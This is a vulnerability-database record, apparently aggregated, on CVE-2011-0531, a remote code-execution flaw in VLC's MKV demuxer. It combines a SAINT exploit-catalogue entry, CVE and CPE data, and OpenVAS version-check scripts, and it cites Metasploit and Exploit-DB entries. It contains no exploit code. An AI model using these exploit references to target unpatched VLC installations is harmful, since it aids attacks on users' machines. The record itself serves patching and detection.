{"type": "saint", "edition": 2, "title": "VideoLAN VLC Media Player MKV Demuxer Code Execution", "references": [], "published": "2011-06-27T00:00:00", "lastseen": "2019-05-29T17:19:52", "description": "Added: 06/27/2011 \nCVE: [CVE-2011-0531](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0531>) \nBID: [46060](<http://www.securityfocus.com/bid/46060>) \nOSVDB: [70698](<http://www.osvdb.org/70698>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVideoLan VLC 1.1.6.1 and earlier are vulnerable to a remote code execution vulnerability as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted `**MKV**` (`**Matroska**` or `**WebM**`) file. \n\n### Resolution\n\nUpgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available. \n\n### References\n\n<http://www.videolan.org/security/sa1102.html> \n\n\n### Limitations\n\nExploit works on VideoLAN VLC 1.1.0. \n\nThe user must open the exploit file on the target with a vulnerable version of VLC. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "viewCount": 5, "modified": "2011-06-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vlc_mkv_demuxer", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0531"]}, {"type": "nessus", "idList": ["VLC_1_1_7.NASL", "GENTOO_GLSA-201411-01.NASL", "DEBIAN_DSA-2211.NASL", "DEBIAN_DSA-2159.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:68956", "OPENVAS:68993", "OPENVAS:902340", "OPENVAS:1361412562310902339", "OPENVAS:1361412562310902340", "OPENVAS:136141256231068993", "OPENVAS:69555", "OPENVAS:136141256231068956", "OPENVAS:902339", "OPENVAS:136141256231069555"]}, {"type": "exploitdb", "idList": ["EDB-ID:16637"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_WEBM"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11425", "SECURITYVULNS:DOC:25701"]}, {"type": "saint", "idList": ["SAINT:FC3F8691377F5D2858A8DBCB8503CA3B", "SAINT:406E0DD61EF13D202107AAD34919B826"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2159-1:3FC9F", "DEBIAN:DSA-2211-1:256DF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:98119"]}, {"type": "gentoo", "idList": ["GLSA-201411-01"]}], "modified": "2019-05-29T17:19:52", "rev": 2}, "score": {"value": 8.4, "vector": "NONE", "modified": "2019-05-29T17:19:52", "rev": 2}, "vulnersScore": 8.4}, "cvelist": ["CVE-2011-0531"], "id": "SAINT:247793ED4A5F81141085F5CFD69DF3F9", "bulletinFamily": "exploit", "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:39:04", "description": "demux/mkv/mkv.hpp in the MKV demuxer plugin in VideoLAN VLC media player 1.1.6.1 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary commands via a crafted MKV (WebM or Matroska) file that triggers memory corruption, related to \"class mismatching\" and the MKV_IS_ID macro.", "edition": 5, "cvss3": {}, "published": "2011-02-07T21:00:00", "title": "CVE-2011-0531", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0531"], "modified": "2017-09-19T01:32:00", "cpe": ["cpe:/a:videolan:vlc_media_player:1.0.5", "cpe:/a:videolan:vlc_media_player:0.9.9", "cpe:/a:videolan:vlc_media_player:1.0.4", "cpe:/a:videolan:vlc_media_player:1.1.3", "cpe:/a:videolan:vlc_media_player:0.1.99i", "cpe:/a:videolan:vlc_media_player:0.2.91", "cpe:/a:videolan:vlc_media_player:0.6.0", "cpe:/a:videolan:vlc_media_player:0.8.4", "cpe:/a:videolan:vlc_media_player:0.2.92", "cpe:/a:videolan:vlc_media_player:0.2.73", "cpe:/a:videolan:vlc_media_player:1.0.3", "cpe:/a:videolan:vlc_media_player:0.2.60", "cpe:/a:videolan:vlc_media_player:0.9.4", "cpe:/a:videolan:vlc_media_player:0.1.99e", "cpe:/a:videolan:vlc_media_player:0.4.1", "cpe:/a:videolan:vlc_media_player:0.9.3", "cpe:/a:videolan:vlc_media_player:0.8.1", "cpe:/a:videolan:vlc_media_player:0.1.99b", "cpe:/a:videolan:vlc_media_player:0.7.0", "cpe:/a:videolan:vlc_media_player:0.9.5", "cpe:/a:videolan:vlc_media_player:0.2.62", "cpe:/a:videolan:vlc_media_player:0.8.2", "cpe:/a:videolan:vlc_media_player:0.8.5", "cpe:/a:videolan:vlc_media_player:1.0.0", "cpe:/a:videolan:vlc_media_player:0.4.5", "cpe:/a:videolan:vlc_media_player:0.7.2", "cpe:/a:videolan:vlc_media_player:1.1.1", "cpe:/a:videolan:vlc_media_player:0.4.3", "cpe:/a:videolan:vlc_media_player:1.1.4", "cpe:/a:videolan:vlc_media_player:0.2.82", "cpe:/a:videolan:vlc_media_player:0.4.2", "cpe:/a:videolan:vlc_media_player:0.2.80", "cpe:/a:videolan:vlc_media_player:0.2.70", "cpe:/a:videolan:vlc_media_player:0.3.0", "cpe:/a:videolan:vlc_media_player:0.2.61", "cpe:/a:videolan:vlc_media_player:0.2.90", "cpe:/a:videolan:vlc_media_player:0.3.1", "cpe:/a:videolan:vlc_media_player:0.2.72", "cpe:/a:videolan:vlc_media_player:1.1.6", "cpe:/a:videolan:vlc_media_player:0.8.6", "cpe:/a:videolan:vlc_media_player:0.2.63", "cpe:/a:videolan:vlc_media_player:0.1.99h", "cpe:/a:videolan:vlc_media_player:0.1.99g", "cpe:/a:videolan:vlc_media_player:1.0.2", "cpe:/a:videolan:vlc_media_player:0.4.0", "cpe:/a:videolan:vlc_media_player:1.0.1", "cpe:/a:videolan:vlc_media_player:1.1.6.1", "cpe:/a:videolan:vlc_media_player:0.4.4", "cpe:/a:videolan:vlc_media_player:1.1.0", "cpe:/a:videolan:vlc_media_player:0.5.2", "cpe:/a:videolan:vlc_media_player:0.4.6", "cpe:/a:videolan:vlc_media_player:0.6.2", "cpe:/a:videolan:vlc_media_player:0.9.10", "cpe:/a:videolan:vlc_media_player:0.9.2", "cpe:/a:videolan:vlc_media_player:0.2.0", "cpe:/a:videolan:vlc_media_player:0.6.1", "cpe:/a:videolan:vlc_media_player:0.5.1", "cpe:/a:videolan:vlc_media_player:0.5.3", "cpe:/a:videolan:vlc_media_player:0.8.0", "cpe:/a:videolan:vlc_media_player:0.5.0", "cpe:/a:videolan:vlc_media_player:0.1.99f", "cpe:/a:videolan:vlc_media_player:0.2.71", "cpe:/a:videolan:vlc_media_player:1.1.5", "cpe:/a:videolan:vlc_media_player:0.9.8a", "cpe:/a:videolan:vlc_media_player:0.2.83", "cpe:/a:videolan:vlc_media_player:0.2.81", "cpe:/a:videolan:vlc_media_player:0.9.6", "cpe:/a:videolan:vlc_media_player:1.1.2", "cpe:/a:videolan:vlc_media_player:1.0.6"], "id": "CVE-2011-0531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0531", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:videolan:vlc_media_player:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.81:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.71:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.92:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.83:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.8a:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.10:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.60:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.72:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.73:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.82:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.90:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99g:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.91:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.70:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99e:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.61:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.80:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.62:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99b:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99h:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99f:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.63:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99i:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-27T19:22:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2020-04-23T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:1361412562310902339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902339", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902339\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025018\");\n\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_mandatory_keys(\"VLCPlayer/Lin/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\");\n script_tag(name:\"affected\", value:\"VLC media player version 1.1.6.1 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\");\n script_tag(name:\"solution\", value:\"Upgrade to the VLC media player version 1.1.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://download.videolan.org/pub/videolan/vlc/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nvlcVer = get_kb_item(\"VLCPlayer/Lin/Ver\");\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_less(version:vlcVer, test_version:\"1.1.7\")){\n report = report_fixed_ver(installed_version:vlcVer, fixed_version:\"1.1.7\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:1361412562310902340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902340", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902340\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\");\n\n\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\");\n script_tag(name:\"affected\", value:\"VLC media player version 1.1.6.1 and prior on Windows\");\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\");\n script_tag(name:\"solution\", value:\"Upgrade to the VLC media player version 1.1.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025018\");\n script_xref(name:\"URL\", value:\"http://download.videolan.org/pub/videolan/vlc/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"1.1.7\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.1.7\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-25T00:00:00", "published": "2011-03-05T00:00:00", "id": "OPENVAS:68956", "href": "http://plugins.openvas.org/nasl.php?oid=68956", "type": "openvas", "title": "FreeBSD Ports: vlc", "sourceData": "#\n#VID f9258873-2ee2-11e0-afcd-0015f2db7bde\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID f9258873-2ee2-11e0-afcd-0015f2db7bde\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: vlc\n\n=====\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.videolan.org/security/sa1102.html\nhttp://www.vuxml.org/freebsd/f9258873-2ee2-11e0-afcd-0015f2db7bde.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(68956);\n script_version(\"$Revision: 5424 $\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-05 22:25:39 +0100 (Sat, 05 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: vlc\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"vlc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.7\")<0) {\n txt += 'Package vlc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:28:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2017-12-19T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:902340", "href": "http://plugins.openvas.org/nasl.php?oid=902340", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_vlc_media_player_code_exec_vuln_win.nasl 8174 2017-12-19 12:23:25Z cfischer $\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\n Impact Level: Application\";\ntag_affected = \"VLC media player version 1.1.6.1 and prior on Windows\";\ntag_insight = \"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\";\ntag_solution = \"Upgrade to the VLC media player version 1.1.7 or later,\n For updates refer to http://download.videolan.org/pub/videolan/vlc/\";\ntag_summary = \"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\";\n\nif(description)\n{\n script_id(902340);\n script_version(\"$Revision: 8174 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 13:23:25 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\");\n\n\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025018\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Check for VLC Media Player Version less than 1.1.7\nif( version_is_less( version:vers, test_version:\"1.1.7\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.1.7\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:20:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2017-08-30T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:902339", "href": "http://plugins.openvas.org/nasl.php?oid=902339", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_vlc_media_player_code_exec_vuln_lin.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 